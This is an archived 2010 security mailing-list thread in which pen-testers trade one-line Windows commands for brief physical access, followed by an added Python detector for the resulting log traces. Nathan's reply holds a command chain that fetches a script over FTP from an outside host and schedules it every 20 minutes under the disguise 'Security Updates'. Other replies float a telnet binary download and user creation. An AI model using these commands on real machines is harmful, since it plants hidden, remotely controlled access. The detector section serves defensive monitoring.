Nice, this is the sort of creative evil I'm looking for. :)

Thanks,
Adrian

On Tue, Mar 16, 2010 at 9:59 AM, Nathan Sweaney <[email protected]> wrote:
> Don't forget that telnet isn't installed by default on Vista & 7.
>
> What about something like this:
>
> echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >>
> %WINDIR%\ftp.scr & echo [email protected] >> %WINDIR%\ftp.scr & echo get
> script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp
> -s:ftp.scr > %WINDIR%\security.bat & echo start %WINDIR%\script.bat >>
> %WINDIR%\security.bat & schtasks /create /tn "Security Updates" /sc minute
> /mo 20 /tr security.bat
>
> I haven't tested it so I may have some syntax wrong, but the basic idea
> should work. Now your box just checks in every 20 minutes & does whatever
> you put in script.bat.
>
> If you wanted to get fancy, you could change script.bat to something like
> 123.123.123.123.bat (or whatever its external IP is). Then just check your
> server logs to see who is connecting & you can customize your scripts to
> each location. That may take a little more fancy kung fu to get your
> external IP though.
>
> nathan
>
>
> -----Original Message-----
> From: [email protected] [mailto:
> [email protected]] On Behalf Of Josh Olson
> Sent: Monday, March 15, 2010 11:46 AM
> To: PaulDotCom Security Weekly Mailing List
> Subject: Re: [Pauldotcom] Quick keyboard pwnage
>
> Adrian,
>
> I haven't been able to make this work, but perhaps with some tweaking,
> telnet and edlin can do it?
>
> Something like:
>
> telnet -f binary.exe
> o site.com port
> GET /path/to/binary.exe
> quit
>
> Then edlin binary.exe /B
> 1,3d
> e
>
> Note that edlin doesn't ship with 64-bit versions of Windows.
>
> Josh
>
> On Sun, Mar 14, 2010 at 2:10 PM, Adrian Crenshaw <[email protected]>
> wrote:
> > Hi All,
> > I need some ideas. Let's say you are the Flash (or Quicksilver if you
> > prefer Marvel comics), and could type uberfast. You have no storage
> > device with you, but like I said, you can type really fast. If you had
> > momentary access to a physical box (Windows or Linux, but I'm most
> > interested in Windows), what command would you run as a pen-tester?
> >
> > Ideas to get us started:
> > 1. Net user add obviously would be an option for some. (this I know the
> > command for)
> > 2. Anyone know a way to enter a binary at the command line and quickly
> > run it?
> > 3. Wget functionality in windows would be nice, then you could just grab
> > exes you want quickly.
> > 4. Quickly upload files off of the target system to someplace you
> > control on the internet.
> >
> > Extra points for simple commands, quick to type, and on one line. If I
> > use your idea, I'll be sure to thank you in the project notes/comments.
> >
> > Thanks,
> > Adrian
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
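
Seen from the defender's side, the scheduled check-in discussed in this thread leaves recognizable process command lines: a `schtasks /create` with a minute-level schedule and a script as its target, and `ftp` driven by a `-s:` command file. The following is an added example, not part of the original emails, that flags both in process-creation logs; the sample log lines, the function names and the 60-minute threshold are assumptions constructed for illustration.

```python
import re

# Constructed process-creation command lines (the kind recorded by Windows
# Security event 4688 or Sysmon event 1); none come from a real host.
SAMPLE_EVENTS = [
    r'schtasks /create /tn "Security Updates" /sc minute /mo 20 /tr security.bat',
    r'ftp -s:ftp.scr',
    r'schtasks /create /tn "Backup" /sc daily /st 02:00 /tr C:\Tools\backup.exe',
    r'ftp.exe ftp.example.test',
    r'schtasks /query /fo LIST',
]

SCRIPT_EXT = re.compile(r'\.(bat|cmd|scr|vbs|ps1)$', re.I)


def schtasks_options(cmdline):
    """Parse '/switch value' pairs into {switch: value}; bare switches are skipped."""
    pairs = re.findall(r'/(\w+)\s+("[^"]*"|[^/\s]\S*)', cmdline)
    return {name.lower(): value.strip('"') for name, value in pairs}


def classify(cmdline, max_minutes=60):
    """Return the findings (possibly none) for one command line."""
    findings = []
    words = cmdline.lower().split()
    exe = words[0].rsplit('\\', 1)[-1] if words else ''
    if exe in ('schtasks', 'schtasks.exe') and '/create' in words:
        opts = schtasks_options(cmdline)
        if opts.get('sc', '').lower() == 'minute':
            mo = opts.get('mo', '1')  # schtasks uses 1 when /mo is omitted
            every = int(mo) if mo.isdigit() else 1
            if every <= max_minutes:
                findings.append(f'task repeats every {every} min')
        if SCRIPT_EXT.search(opts.get('tr', '')):
            findings.append(f"task runs script {opts['tr']}")
    if exe in ('ftp', 'ftp.exe') and any(w.startswith('-s:') for w in words[1:]):
        findings.append('ftp driven by a command file (-s:)')
    return findings


def scan(events):
    """Map each flagged command line to its findings."""
    return {e: f for e in events if (f := classify(e))}


if __name__ == '__main__':
    for cmd, why in scan(SAMPLE_EVENTS).items():
        print(f'{"; ".join(why)}: {cmd}')
```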
